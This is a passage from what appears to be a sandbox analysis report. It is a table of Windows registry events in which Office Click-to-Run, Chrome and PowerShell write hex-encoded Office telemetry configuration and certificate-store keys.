64476574486f73744361706162696c69746965735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c706572476574486f73744361706162696c69746965735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c706572456e6447657455736572417474726962757465735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c70657247657455736572417474726962757465735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c706572456e644765744c696e6b735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c7065724765744c696e6b735c22203a207b205c224576656e74466c61675c22203a2032 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ETag = "std::wstring|\"oifxXcYG5TtLvZoogJ5HQJvoH6f6oyQgMHpiuT6xHAQ=\"" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.12 = 3a207b205c22416c7465726e6174655472616e736c6174696f6e735265747269657665645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f6e7465787475616c53756767657374696f6e734c6f616465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e745465787453656c65637465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e745472616e736c617465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e745472616e736c61746564466565646261636b547269676765725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e745472616e736c6174696f6e43616e63656c6c65645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e745472616e736c6174696f6e53756767657374696f6e436c69636b65645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224578636c756465644c616e677561676541646465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224578636c756465644c616e677561676552656d6f7665645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224d6963726f666565646261636b566f746553656c65637465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f6f786d6c5472616e736c617465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2253657474696e6773436c6f7365645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2253657474696e67734f70656e65645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22536f75726365446f63756d656e744c616e674368616e6765645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22536f75726365546172676574537761707065645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22536f75726365546578744c616e674368616e6765645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22546172676574446f63756d656e744c616e674368616e6765645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22546172676574546578744c616e674368616e6765645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22546578745472616e736c617465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225472616e736c6174696f6e496e7365727465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225472616e736c6174696f6e4c616e6775616765734c6f616465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225472616e736c6174696f6e5461624368616e6765645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22416c7465726e6174655472616e736c6174696f6e4578616d706c655265747269657665645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22416c7465726e6174655472616e736c6174696f6e436f706965645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22416464496e4c6f616465645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e5558222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c22436f6c6f725069636b65725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f6d696e67536f6f6e54435348574e445c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224e6f46696c65457874656e73696f6e49636f6e4d617070696e675c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c225344585c22203a207b205c225375624e616d657370616365735c22203a207b205c224d65436f6e74726f6c5c22203a207b205c224576656e74735c22203a207b205c22547261636b65645363656e6172696f5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d2c205c225465616368696e6743616c6c6f75745c22203a207b205c224576656e74735c22203a207b205c225465616368696e6743616c6c6f7574416c726561647953686f776e4d617854696d65735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225465616368696e6743616c6c6f7574416c726561647953686f776e5468697353657373696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225465616368696e6743616c6c6f7574546f6f4d616e7953686f776e5468697353657373696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2244796e616d69634470695c22203a207b205c224576656e74735c22203a207b205c22446973706c6179546f706f6c6f6779456e756d65726174696f6e5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22446973706c6179546f706f6c6f67794368616e6765645c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c22446f63756d656e745265636f766572795c22203a207b205c224576656e74735c22203a207b205c22496e76616c696461746550616e65735c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22546f6f6c746970735c22203a207b205c224576656e74735c22203a207b205c2253686f77546f6f6c7469705c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22416e63686f7252656769737472795c22203a207b205c224576656e74735c22203a207b205c224765744f72437265617465416e63686f7252656769737472795c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22526962626f6e546162735c22203a207b205c224576656e74735c22203a207b205c22526962626f6e5461624163746976617465645f466c6f6f64676174655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e576f7264222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c224544505c22203a207b205c224576656e74735c22203a207b205c22446f63756d656e744964656e746974794368616e67655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2250726f6f66696e675c22203a207b205c224576656e74735c22203a207b205c2250726f6f66696e674e6f50726f6f66526567696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225453706c4c6f61644c6962726172795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436c6f75645370656c6c6572436865636b5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224e6f50726f6f6652756e4469666665727346726f6d5061726150726f705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436c617373696669636174696f6e4372697469717565526573706f6e7365506572664d61704578636565645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224772616d6d6172436865636b657243616c6c5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22536176655c22203a207b205c224576656e74735c22203a207b205c22436d64446f53617665446f63436f7265436f6d6d616e64416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436d64446f53617665446f63436f7265416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22464d617953746172745472616e73616374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224669726553746174654f664175746f536176654f6e436c6f73655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22456964456e737572654f70656e466f72536176655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2242475361766546616c6c6261636b546f46475c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22576f72645c22203a207b205c225375624e616d657370616365735c22203a207b205c22426f6f745c22203a207b205c225375624e616d657370616365735c22203a207b205c2254696d696e675c22203a207b205c224576656e74735c22203a207b205c22446174615c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d207d207d2c205c22426f6f745c22203a207b205c224576656e74735c22203a207b205c22416464696e4d6f6e69746f7256616c6964617465426f6f745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22416464696e44697361626c65644469616c6f675c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22416464696e4d6f6e69746f7256616c6964617465426f6f74325c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2246696c654f70656e5c22203a207b205c224576656e74735c22203a207b205c22464e4d45696453657446726f6d5873747a46747970466e6d4469725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e697469616c697a6542696e6172794261636b696e6753746f72654361636865735c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22576f72644d61696c5c22203a207b205c224576656e74735c22203a207b205c2248724c6f61645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224872536176655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22446f6354696c696e675c22203a207b205c224576656e74735c22203a207b205c2254696c696e6749646c6542756e646c654576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2254696c696e6749646c655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2254696c696e6749646c654865617274626561745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2254696c696e6749646c654669726542756e646c65644576656e74735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225465787454696c65446f63756d656e7456696577476574456e756d657261746f724576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225465787454696c65446f63756d656e7456696577446973636f6e6e6563745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225465787454696c65446f63756d656e745669657753696e6b52656769737465725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225465787454696c65446f63756d656e745669657753696e6b556e72656769737465725c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22436f417574686f72696e675c22203a207b205c224576656e74735c22203a207b205c224f6373446f776e6c6f6164526566557064617465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2244796e616d696353617665496e697469616c496e666f5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22507573684f70526571756573745374617475735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22507573684f70436f6d706c657465645374617475735c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2254687265655761794d657267655c22203a207b205c224576656e74735c22203a207b205c22435254435265766572745265706c61794b706f7353636f70654475726174696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2246696c65536176655c22203a207b205c224576656e74735c22203a207b205c22436d645361766546696c65436f7265325c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2255494d5c22203a207b205c224576656e74735c22203a207b205c224655494d426567696e556e646f4265666f726546426567696e556e646f5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224655494d426567696e556e646f416674657246426567696e556e646f5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224163636573736962696c6974795c22203a207b205c224576656e74735c22203a207b205c22416363436865636b657256696f6c6174696f6e547970655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2247726170686963735c22203a207b205c224576656e74735c22203a207b205c2245326f496e666f466f72446f63756d656e74436f6e7461696e696e674475706c696361746541727469645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22446961676e6f737469635c22203a207b205c224576656e74735c22203a207b205c22496e636f73697374656e74526561644f6e6c79446f6350726f70657274795c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22547261636b4368616e6765735c22203a207b205c224576656e74735c22203a207b205c22557463547261636b4368616e67657341646465645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2255736572507265666572656e63655c22203a207b205c224576656e74735c22203a207b205c225365744972665c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e4368616e6765476174652e4361636865456e726963686d656e74416363657373546f6b656e222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e526573656172636865722e4e6f64654a5357656250616765457874726163746f72222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e48656c704974656d53706c6974427574746f6e456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e48656c7050726f7669646572456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e497350656f706c654974656d53706c6974427574746f6e456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e4d616a6f724974656d53706c6974427574746f6e456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e4d6178436f6d6d616e64526573756c7473546f52657475726e222c20225622203a2022696e7433325f747c3422207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e506172616d657465725465726d50726564696374696f6e456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e51756572794c6f6767696e67456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e536861726564446f63756d656e74456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e53686f756c6453686f7748656c70416374696f6e73222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e53686f774f6e6c794974656d4c6162656c49664465736372697074696f6e49734e756c6c222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e57617465726d61726b506172616d65746572697a6174696f6e456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e5a65726f417373697374616e6365526573756c7473456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5558506c6174666f726d2e4973506572736f6e6150726f66696c65504358456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5558506c6174666f726d2e52656d6f76654d53414148616e646c6572466f7254657874426f78222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5558506c6174666f726d2e5465616368696e6743616c6c6f757454696d654f6e53637265656e54656c656d65747279222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5558506c6174666f726d2e5468656d696e672e5573654d656469756d4c756d696e616e63655468726573686f6c64222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5558506c6174666f726d2e5569614e6f74696669636174696f6e73466f72427573426172456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5558506c6174666f726d2e556961 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "1" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|12" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|5" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|11" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\Expires = "int64_t|1711498909" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133559283764396213" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|7" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|1" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.3 = 203a20227374643a3a77737472696e677c323032302d30342d32315430303a30303a30302b30303a303022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4c6963656e73696e672e456e61626c6547726163655769746857414350726f6d6f427573426172222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4c6963656e73696e672e456e61626c654d6f6465726e41464f222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4c6963656e73696e672e486561727462656174446179734265666f726545787044617465222c20225622203a2022696e7433325f747c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4c6963656e73696e672e4e6f456e7469746c656d656e747353656c6653657276696365222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4c6963656e73696e672e4e6f456e7469746c656d656e74735472794275794578706572696d656e7454726561746d656e74222c20225622203a2022696e7433325f747c3222207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4c6963656e73696e672e53686f77564e6578745369676e4f75744469616c6f67222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4c6963656e73696e672e5573655265666163746f726564436f6e666967446570726f766973696f6e222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4c6963656e73696e672e5573655265666163746f726564476574557365724c6963656e7365222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4d616e6167656162696c6974792e436c6f7564506f6c6963792e4e6f6e5075626c6963436c6f7564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4d616e6167656162696c6974792e54656e616e744173736f63696174696f6e4b65792e4e6f6e5075626c6963436c6f7564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4d616e6167656162696c6974792e5573654f637073563255726c496e57696e222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4e616e63794f66666963655465616d2e7a686574616e34313232303231222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e416c6c6f7741626f7274517569636b436865636b45777353657276696365222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e416c6c6f7741626f7274517569636b436865636b4f6d657853657276696365222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e4368616e6765476174652e496e766f6b6546657463684d616e696665737443616c6c6261636b4f6e446f776e6c6f61644d616e6966657374222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e4368616e6765476174652e557365436c6f6e6564496e7374616e6365466f724572726f72222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e4368616e6765476174652e56616c6964617465446f776e6c6f61645265736f7572636573222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e4469616c6f6754776f5761794d6573736167696e67222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e456e61626c654d696e43616368655265667265736820222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e4964656e746974794361636865466f72636552656672657368222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e4f7366496e7374616c6c6572526567697374657242675461736b222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e506572557365724964656e746974794d696e4361636865222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e506572557365724964656e74697479526962626f6e4361636865222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e5765624b69743246756c6c4469616c6f67415049222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f4d45582e456e61626c65456e7465727072697365436f6d416464696e536574436f6e6e656374496e7465726e616c5570646174654576656e7473222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f4d45582e456e61626c65456e7465727072697365436f6d416464696e556e68616e646c6564457863657074696f6e4576656e7473222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f6172742e456e61626c65496e736572744d6564696154656c656d65747279222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f6e654e6f74652e4170706c652e43576f726b73706163655573657255736555726c46726f6d526177556e69636f6465537472696e67222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f6e654e6f74652e4368616e6765476174652e53686f77494150456e747279222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f6e654e6f74652e44656570426174636853746f7265456e61626c6564222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f6e654e6f74652e52656e6465725570646174656457696e333252656458222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f6e654e6f74652e53686f756c645573654e6574436f7374496e73746561644f664d736f426c6f636b696e67222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f75746c6f6f6b2e4c6173744d696c6554656c656d6574727954726163657274222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f75746c6f6f6b2e5063782e4c696e6b6564496e4b32466978222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f75746c6f6f6b2e5063782e5063784a756e65323031394275674669786573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f75746c6f6f6b2e526970636f72642e33363134383230222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f75746c6f6f6b2e526970636f72642e33393039323635222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f75746c6f6f6b2e526970636f72642e33393435323833222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5043582e526970636f72642e56534f2e33363432383036222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506572666f726d616e63652e426c6f636b696e6757616974732e4f737250726f63657373222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506572666f726d616e63652e4368616e6765476174652e586c426f6f74436f6d706c657465416674657246696c654f70656e416e6453706c61736853637265656e222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506572736f6e616c697a6174696f6e2e456e61626c65476574496e736967687473222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506572736f6e616c697a6174696f6e2e456e61626c6553656e645369676e616c222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506572736f6e616c697a6174696f6e2e47657455736572466163747354696d656f75744d696c6c697365636f6e6473222c20225622203a2022696e7433325f747c3530303022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506572736f6e616c697a6174696f6e2e557365476574496e736967687473466c6f77466f724665746368696e67476f7665726e616e636544617461222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506f776572506f696e742e4368616e6765476174652e436865636b56696577496e536c6964654a616e69746f724f62736572766572222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506f776572506f696e742e4368616e6765476174652e466f726365536f6674776172654d696e69617475726552656e646572696e67222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506f776572506f696e742e4368616e6765476174652e4d657267652e5573655468726f77696e674c69666567756172645374657073222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506f776572506f696e742e4368616e6765476174652e536c69646553686f772e52656c65617365536c69646553686f774d616e616765724265666f726547667853687574646f776e222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506f776572506f696e742e48616e646c65434c524372617368222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506f776572506f696e742e53756767657374696f6e732e456e61626c65436f6e74656e745265636f6d6d656e646174696f6e4974656d73222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e50726f6a6563742e50726f6a65637443325253657276657232303133436f6e6e656374696f6e426c6f636b222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e50726f6a6563742e50726f6a65637443656e74656e6e69616c53657276657232303133426c6f636b222c20225622203a2022626f6f6c7c3122207d2c207b2022462220